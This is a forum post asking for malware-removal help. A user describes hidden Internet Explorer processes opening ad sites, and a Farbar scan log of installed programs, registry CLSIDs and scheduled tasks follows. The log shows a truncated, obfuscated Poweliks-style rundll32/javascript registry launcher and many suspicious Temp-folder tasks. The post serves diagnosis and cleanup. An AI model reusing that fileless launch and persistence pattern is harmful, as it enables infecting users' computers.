
dllhost.exe seems to take over my computer.



When I start up my computer, I can run for a few minutes without any issue. However, after a little while, I see multiple instances of dllhost.exe start in my task manager, and from there, everything falls apart. The slowdowns and other issues make the computer nearly unusable (so much so that I have to use someone else's computer to post this). I have tried running Herd Protect and MalwareBytes, and neither worked. It happens randomly, and it seems to happen more often when I start a web browser. Regardless of if the browser is open, it opens web pages I cannot see. When I end those processes (iexplorer.exe), they come back, and they multiply. They go to various ad websites for incredibly random things. But I can't see any of this if the task manager isn't there. There are no Internet Explorer windows open for me to see this in. My computer just grinds to a halt.

Posting my farbar log files in my next post, and they are attached at the end of this message as well.


addition.txt

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 08-11-2014 01
Ran by Tyler at 2014-11-09 06:06:24
Running from C:\Users\Tyler\Desktop
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {ADA629C7-7F48-5689-624A-3B76997E0892}
AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {16C7C823-5972-5907-58FA-0004E2F9422F}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Ace of Spades (HKLM\...\Steam App 224540) (Version:  - Jagex Limited)
Acrobat.com (HKLM\...\com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.1.377 - Adobe Systems Incorporated)
Acrobat.com (Version: 0.0.0 - Adobe Systems Incorporated) Hidden
Adobe AIR (HKLM\...\Adobe AIR) (Version: 2.7.1.19610 - Adobe Systems Incorporated)
Adobe Community Help (HKLM\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 3.0.0.400 - Adobe Systems Incorporated)
Adobe Flash Player 15 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Flash Player 15 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 15.0.0.152 - Adobe Systems Incorporated)
Adobe Media Player (HKLM\...\com.adobe.amp.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.8 - Adobe Systems Incorporated)
Adobe Reader 9.5.5 (HKLM\...\{AC76BA86-7AD7-1033-7B44-A95000000001}) (Version: 9.5.5 - Adobe Systems Incorporated)
Apple Application Support (HKLM\...\{83CAF0DE-8D3B-4C37-A631-2B8F16EC3031}) (Version: 3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{235EBB33-3DA1-46DF-AADE-9955123409CB}) (Version: 8.0.5.6 - Apple Inc.)
Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Banctec Service Agreement (HKLM\...\{42D68A86-DB1C-4256-B8C9-5D0D92919AF5}) (Version: 2.0.0 - Dell Inc.)
Battle.net (HKLM\...\Battle.net) (Version:  - Blizzard Entertainment)
Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)
Borderlands (HKLM\...\Steam App 8980) (Version:  - Gearbox Software)
Chantelise - Demo (HKLM\...\Steam App 70430) (Version:  - )
Choice Guard (Version: 1.2.87.0 - Microsoft Corporation) Hidden
Cisco EAP-FAST Module (HKLM\...\{415B2719-AD3A-4944-B404-C472DB6085B3}) (Version: 2.1.6 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM\...\{83770D14-21B9-44B3-8689-F7B523F94560}) (Version: 1.0.12 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM\...\{669C7BD8-DAA2-49B6-966C-F1E2AAE6B17E}) (Version: 1.0.13 - Cisco Systems, Inc.)
Curse (HKLM\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 6.0.0.0 - Curse)
Dell Dock (HKLM\...\{F6CB42B9-F033-4152-8813-FF11DA8E6A78}) (Version: 1.0.0 - Dell)
Dell Getting Started Guide (HKLM\...\{7DB9F1E5-9ACB-410D-A7DC-7A3D023CE045}) (Version: 1.00.0000 - Dell Inc.)
Dell Remote Access (HKLM\...\{F66A31D9-7831-4FBA-BA02-C411C0047CC5}) (Version: 1.0.0.0 - Dell Inc.)
Dell Support Center (Support Software) (HKLM\...\{E3BFEE55-39E2-4BE0-B966-89FE583822C1}) (Version: 2.2.08298 - Dell)
Dell System Detect (HKCU\...\9204f5692a8faf3b) (Version: 5.7.0.6 - Dell)
Dell Touchpad (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 7.2.115.201 - Alps Electric)
Dell Wireless WLAN Card Utility (HKLM\...\Broadcom 802.11 Application) (Version: 5.10.38.30 - Dell Inc.)
DELL0604 (Version: 1.0.0 - WildTangent) Hidden
DivX Setup (HKLM\...\DivX Setup) (Version: 2.6.1.24 - DivX, LLC)
Dual-Core Optimizer (HKLM\...\{9FD6F1A8-5550-46AF-8509-271DF0E768B5}) (Version: 1.1.4.0169 - AMD)
EDocs (HKLM\...\{6B7B6D4D-8F9B-4CB3-8CA4-BCA9CC4C1A22}) (Version:  - )
Evolve (HKLM\...\{670B1B49-9FD3-4827-9B41-471EFF580AA8}) (Version: 1.8.8 - Echobit, LLC)
Gmask 1.70 English (HKLM\...\Gmask 1.70 English) (Version:  - )
Google Chrome (HKCU\...\Google Chrome) (Version: 38.0.2125.111 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)
Google Toolbar for Internet Explorer (Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (Version: 1.3.25.5 - Google Inc.) Hidden
GoToAssist 8.0.0.514 (HKLM\...\GoToAssist) (Version:  - )
Graphical Analysis 3.4 (HKLM\...\{047B3D5A-3E67-429E-8A12-B204B6B31DF8}) (Version: 3.4 - Vernier Software & Technology)
Hearthstone (HKLM\...\Hearthstone) (Version:  - Blizzard Entertainment)
InstaCodecs (HKLM\...\InstaCodecs_is1) (Version: 1.0 - )
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: 8.15.10.1994 - Intel Corporation)
Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version:  - Intel Corporation)
iTunes (HKLM\...\{5D928931-D1D2-4A93-A82D-BF60D0E7CFA5}) (Version: 12.0.1.26 - Apple Inc.)
Java 7 Update 71 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F03217071FF}) (Version: 7.0.710 - Oracle)
Jazz Jackrabbit 2 (HKLM\...\Jazz Jackrabbit 2) (Version:  - )
Juniper Networks, Inc. Setup Client (HKCU\...\Juniper_Setup_Client) (Version: 7.4.8.42127 - Juniper Networks, Inc.)
Juniper Networks, Inc. Setup Client Activex Control (HKLM\...\Juniper_Setup_Client Activex Control) (Version: 2.1.1.1 - Juniper Networks, Inc.)
Junk Mail filter update (Version: 14.0.8050.1202 - Microsoft Corporation) Hidden
KAG 0.95A (HKLM\...\King Arthur's Gold (Alpha)_is1) (Version:  - Michal Marcinkowski THD)
Katawa Shoujo (HKLM\...\Katawa Shoujo) (Version:  - )
Katawa Shoujo Act 1 (HKLM\...\Katawa Shoujo Act 1) (Version:  - )
League of Legends (HKLM\...\League of Legends 3.0.0) (Version: 3.0.0 - Riot Games)
League of Legends (Version: 3.0.0 - Riot Games) Hidden
LIMBO (HKLM\...\Steam App 48000) (Version:  - )
LINE (HKLM\...\LINE) (Version: 3.7.6.116 - LINE Corporation)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
MapleStory (HKLM\...\MapleStory) (Version:  - )
McAfee AntiVirus (HKLM\...\MSC) (Version: 12.8.988 - McAfee, Inc.)
McAfee Virtual Technician (HKLM\...\McAfee Virtual Technician) (Version: 6.5.0.2101 - McAfee, Inc.)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Age of Empires II (HKLM\...\Age of Empires 2.0) (Version:  - )
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Sync Framework Runtime Native v1.0 (x86) (HKLM\...\{8A74E887-8F0F-4017-AF53-CBA42211AAA5}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Sync Framework Services Native v1.0 (x86) (HKLM\...\{BD64AF4A-8C80-4152-AD77-FCDDF05208AB}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
MSVCRT (Version: 14.0.1468.721 - Microsoft) Hidden
Mumble 1.2.8 (HKLM\...\{A9DBD31A-A09F-4C7E-86D1-3B21C59000D1}) (Version: 1.2.8 - Thorvald Natvig)
Nexon Game Manager (HKLM\...\{EA2DB6E0-72C5-4ef9-A3A0-E6705F4A6A9E}) (Version:  - )
NVIDIA PhysX (HKLM\...\{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}) (Version: 9.12.1031 - NVIDIA Corporation)
OGA Notifier 2.0.0048.0 (Version: 2.0.0048.0 - Microsoft Corporation) Hidden
Pando Media Booster (HKLM\...\{980A182F-E0A2-4A40-94C1-AE0C1235902E}) (Version: 2.3.6.0 - Pando Networks Inc.)
Peggle Deluxe (HKLM\...\Steam App 3480) (Version:  - PopCap Games, Inc.)
Pokemon Showdown (HKLM\...\Pokemon Showdown) (Version:  - "Pokemon Showdown")
Portal (HKLM\...\Steam App 400) (Version:  - Valve)
PowerDVD (HKLM\...\{6811CAA0-BF12-11D4-9EA1-0050BAE317E1}) (Version: 8.1 - Dell)
Project64 1.6 (HKLM\...\{9559F7CA-5E34-4237-A2D9-D856464AD727}) (Version: 1.6 - Project64)
Psychonauts (HKLM\...\Steam App 3830) (Version:  - Double Fine Productions, Inc.)
QuickSet (HKLM\...\{C4972073-2BFE-475D-8441-564EA97DA161}) (Version: 9.2.11 - Dell Inc.)
QuickTime (HKLM\...\{C9E14402-3631-4182-B377-6B0DFB1C0339}) (Version: 7.70.80.34 - Apple Inc.)
Recettear: An Item Shop's Tale - Demo (HKLM\...\Steam App 70410) (Version:  - EasyGameStation)
Roxio Creator DE (HKLM\...\{09760D42-E223-42AD-8C3E-55B47D0DDAC3}) (Version: 10.1 - Roxio)
Shared C Run-time for x86 (Version: 10.0.0 - McAfee) Hidden
Skype™ 6.21 (HKLM\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 6.21.104 - Skype Technologies S.A.)
Spelling Dictionaries Support For Adobe Reader 9 (HKLM\...\{AC76BA86-7AD7-5464-3428-900000000004}) (Version: 9.0.0 - Adobe Systems Incorporated)
Star Wars Jedi Knight Jedi Academy (HKLM\...\{1EECBA68-8BE4-4076-94DF-E9ED206B1D21}) (Version:  - )
Steam (HKLM\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
System Requirements Lab Detection (HKLM\...\{23C1EA28-BA75-469D-864C-9880D35AB582}) (Version: 2.2.1.0 - Husdawg, LLC)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.8.1 - TeamSpeak Systems GmbH)
Terraria (HKLM\...\Steam App 105600) (Version:  - Re-Logic)
The Elder Scrolls Online (HKLM\...\The Elder Scrolls Online) (Version: 1.0.0.0 - Zenimax Online Studios)
Unity Web Player (HKCU\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
Unturned (HKLM\...\Steam App 304930) (Version:  - Nelson Sexton)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
VC80CRTRedist - 8.0.50727.6195 (Version: 1.2.0 - DivX, Inc) Hidden
Vindictus (HKLM\...\Steam App 212160) (Version:  - Nexon)
VLC media player (HKLM\...\VLC media player) (Version: 2.1.5 - VideoLAN)
Voyetra Record Producer (HKLM\...\InstallShield_{28358FC7-703D-4D27-B791-B93C36650157}) (Version: 5.01.4100 - Voyetra Turtle Beach, Inc.)
Voyetra Record Producer (Version: 5.01.4100 - Voyetra Turtle Beach, Inc.) Hidden
WebM Project Directshow Filters (HKCU\...\webmdshow) (Version:  - )
Windows Live Essentials (HKLM\...\WinLiveSuite_Wave3) (Version: 14.0.8050.1202 - Microsoft Corporation)
Windows Live Sign-in Assistant (HKLM\...\{9422C8EA-B0C6-4197-B8FC-DC797658CA00}) (Version: 5.000.818.6 - Microsoft Corporation)
Windows Live Sync (HKLM\...\{FDD810CA-D5E3-40E9-AB7B-36440B0D41EF}) (Version: 14.0.8050.1202 - Microsoft Corporation)
Windows Live Upload Tool (HKLM\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
WinRAR 4.00 (32-bit) (HKLM\...\WinRAR archiver) (Version: 4.00.0 - win.rar GmbH)
Xiph.Org Ogg Codecs 0.83.17220 32-bit (HKLM\...\Ogg Codecs) (Version: 0.83.17220 - Xiph.Org)
Xiph.Org Open Codecs 0.85.17777 (HKLM\...\Open Codecs) (Version: 0.85.17777 - Xiph.Org)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{022105BD-948A-40C9-AB42-A3300DDF097F}\localserver32 -> C:\Users\Tyler\AppData\Local\Google\Update\GoogleUpdate.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{035FBE31-3755-450A-A775-5E6BBD43D344}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.21.135\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.25.5\psuser.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{1c492e6a-2803-5ed7-83e1-1b1d4d41eb39}\InprocServer32 -> C:\Program Files\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll No File
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{22181302-A8A6-4F84-A541-E5CBFC70CC43}\localserver32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.25.5\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{2F0E2680-9FF5-43C0-B76E-114A56E93598}\localserver32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.25.5\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{31261F21-2B16-45EE-BEAB-07C4CFA18B65}\InprocServer32 -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.23.9\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}\InprocServer32 -> C:\Users\Tyler\AppData\LocalLow\Unity\WebPlayer\loader\UnityWebPluginAX.ocx (Unity Technologies ApS)
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{51F9E8EF-59D7-475B-A106-C7EA6F30C119}\localserver32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.25.5\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{5C65F4B0-3651-4514-B207-D10CB699B14B}\localserver32 -> C:\Users\Tyler\AppData\Local\Google\Chrome\Application\38.0.2125.111\delegate_execute.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{62A0D750-DED9-448C-B693-406B34BB0892}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.21.145\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{634059C0-D264-4B2C-AE80-F73E48D33E5B}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.21.123\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{6D7374DE-63AA-473C-8C02-60D9CDCD84C5}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.21.153\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.24.15\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{91EFB276-CEFE-48EC-BB3A-57795A7B4008}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.21.149\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{A45426FB-E444-42B2-AA56-419F8FBEEC61}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.22.3\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{A54D478D-4F70-4F72-9A74-17C9986E35AB}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.21.165\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{C3101A8B-0EE1-4612-BFE9-41FFC1A3C19D}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{C442AC41-9200-4770-8CC0-7CDB4F245C55}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{E67BE843-BBBE-4484-95FB-05271AE86750}\localserver32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.25.5\GoogleUpdateOnDemand.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.25.5\psuser.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{EB06378B-ABB6-4B3C-9B40-D488DD8A6E93}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.22.5\psuser.dll No File
CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.24.7\psuser.dll No File
 
==================== Restore Points  =========================
 
03-10-2014 00:14:48 Scheduled Checkpoint
04-10-2014 02:47:13 Device Driver Package Install: Apple, Inc. Universal Serial Bus controllers
05-10-2014 17:08:11 Scheduled Checkpoint
09-10-2014 21:19:18 Scheduled Checkpoint
16-10-2014 21:27:02 Installed Java 7 Update 71
17-10-2014 02:54:45 Installed System Requirements Lab Detection
17-10-2014 07:01:39 Windows Update
23-10-2014 23:24:10 Scheduled Checkpoint
01-11-2014 02:34:50 Scheduled Checkpoint
03-11-2014 23:36:57 Scheduled Checkpoint
09-11-2014 08:34:53 herdProtect before 20 removals
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2006-11-02 05:23 - 2006-09-18 16:41 - 00000761 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost
::1             localhost
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {02F3A87A-548F-47BC-BD68-5A888092064A} - \723068096 No Task File <==== ATTENTION
Task: {03F376E0-F1CB-4296-B87B-4B309DB588CD} - System32\Tasks\winupd => C:\Users\Tyler\AppData\Local\Temp:winupd.exe
Task: {0AC14CC6-C57B-4E94-AEF6-C84CDCDD4568} - System32\Tasks\GoogleUpdateTaskMachineUA1cfec4f46187060 => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-10-20] (Google Inc.)
Task: {1097C274-B2F3-48B9-9A33-BB93A58AE7A4} - System32\Tasks\41e4db80 => C:\Users\Tyler\AppData\Local\Temp\\setup580511104.exe <==== ATTENTION
Task: {12E04DA3-AC3E-4876-97D2-2B5068500975} - System32\Tasks\2b8cf180 => C:\Users\Tyler\AppData\Local\Temp\\setup2968322816.exe <==== ATTENTION
Task: {1E9DA8F4-3624-4D36-9935-C638BF1BF2C8} - \1854721336 No Task File <==== ATTENTION
Task: {2086FFDA-25FD-41B6-8B15-B04E039FB5A7} - System32\Tasks\3db6c280 => C:\Users\Tyler\AppData\Local\Temp\\setup2671896960.exe <==== ATTENTION
Task: {22EDF7AF-765C-481D-B0F0-F35C8E5B42D2} - System32\Tasks\1282a400 => C:\Users\Tyler\AppData\Local\Temp\\setup2020529920.exe <==== ATTENTION
Task: {2D9354A7-0098-4C70-AF65-3E9ACDE16AD8} - \2105017024 No Task File <==== ATTENTION
Task: {347B25AD-737F-4CB2-9CE4-B7143274228A} - System32\Tasks\win402b40 => C:\Users\Tyler\AppData\Local\Temp\win402b40.dat <==== ATTENTION
Task: {3F4E49C7-1C2F-4FB9-B036-D5125C75F62D} - System32\Tasks\Launch BCM WLAN Tray => C:\Windows\system32\WLTRAY.EXE [2008-12-22] (Dell Inc.)
Task: {48ED1995-0CAB-4211-A9D0-4A431EA2D062} - System32\Tasks\dd91ed80 => C:\Users\Tyler\AppData\Local\Temp\\setup731568512.exe <==== ATTENTION
Task: {4A9850DC-9325-4F8E-9F8F-BC7A334C11CC} - \612777664 No Task File <==== ATTENTION
Task: {54659C83-9DFE-4ECB-AE9D-D6527B229EF3} - \2778588544 No Task File <==== ATTENTION
Task: {5581028F-00F2-4331-AF8D-49606E3588AA} - System32\Tasks\5c3cd980 => C:\Users\Tyler\AppData\Local\Temp\\setup2856699264.exe <==== ATTENTION
Task: {5B5DF183-F14E-4E77-945A-39A2D2863E06} - \3106137952 No Task File <==== ATTENTION
Task: {62BA65A3-F904-4AC4-86ED-9C2355F937E8} - \77464128 No Task File <==== ATTENTION
Task: {635409A9-D3ED-44BA-88AC-8261B1450358} - System32\Tasks\1e723ec0 => C:\Users\Tyler\AppData\Local\Temp\\setup2709505536.exe <==== ATTENTION
Task: {65A519A5-404C-4F00-8901-FBE3928E9616} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-10-20] (Google Inc.)
Task: {6A669327-4173-4D1D-B406-6AC69FAD66EB} - System32\Tasks\8728f2c0 => C:\Users\Tyler\AppData\Local\Temp\\setup3760815040.exe <==== ATTENTION
Task: {6F6E9732-E8BD-467A-8947-4D956FBFB026} - System32\Tasks\c584be80 => C:\Users\Tyler\AppData\Local\Temp\\setup378817920.exe <==== ATTENTION
Task: {784E7FC3-2476-4EBB-B997-81A1F8959E44} - System32\Tasks\14770480 => C:\Users\Tyler\AppData\Local\Temp\\setup1325249920.exe <==== ATTENTION
Task: {78894A2C-9761-42DF-9B27-7560BF67DA72} - System32\Tasks\3d62c280 => C:\Users\Tyler\AppData\Local\Temp\\setup2389856640.exe <==== ATTENTION
Task: {79F67B3A-4697-46A2-BED6-B71965760E83} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-879967681-4271235005-1519339517-1000Core => C:\Users\Tyler\AppData\Local\Google\Update\GoogleUpdate.exe [2012-09-19] (Google Inc.)
Task: {7A37EF97-DB03-409A-AA13-EE2066C8CA16} - \1837831808 No Task File <==== ATTENTION
Task: {7AC62A27-75DB-4C4B-9D97-09C9CEFD1F9A} - System32\Tasks\a9ca0c80 => C:\Users\Tyler\AppData\Local\Temp\\setup3830496640.exe <==== ATTENTION
Task: {8576719E-EA86-405E-86DB-87A849BFF5C7} - System32\Tasks\p9pl5944863637826728850 => \\?\globalroot\Device\HarddiskVolume3\Users\Tyler\AppData\Local\Temp\p9pl5944863637826728850.tmp <==== ATTENTION
Task: {8E2D0CED-A382-4C75-AE93-C0A74561308A} - System32\Tasks\ec10ca40 => C:\Users\Tyler\AppData\Local\Temp\\setup802090624.exe <==== ATTENTION
Task: {8F2D83C7-454E-498B-AA2C-76F5345946AA} - System32\Tasks\59c9e100 => C:\Users\Tyler\AppData\Local\Temp\\setup3556369856.exe <==== ATTENTION
Task: {934728FC-EE47-4533-8858-A8E13EED00E9} - System32\Tasks\AdobeAAMUpdater-1.0-Tyler-PC-Tyler => C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2010-03-06] (Adobe Systems Incorporated)
Task: {960BD142-4858-4A58-A5B4-6941A9B56291} - \735723520 No Task File <==== ATTENTION
Task: {9CE86707-2679-4ED1-B2BC-521F4AED3520} - System32\Tasks\90bebf80 => C:\Users\Tyler\AppData\Local\Temp\\setup1903413632.exe <==== ATTENTION
Task: {9E17A182-5687-427B-B1EC-28EE0EEFAD54} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-879967681-4271235005-1519339517-1000UA1cfeb0948c7c370 => C:\Users\Tyler\AppData\Local\Google\Update\GoogleUpdate.exe [2012-09-19] (Google Inc.)
Task: {A6AFE3FF-EBD9-4327-A603-C08004EDF913} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-24] (Adobe Systems Incorporated)
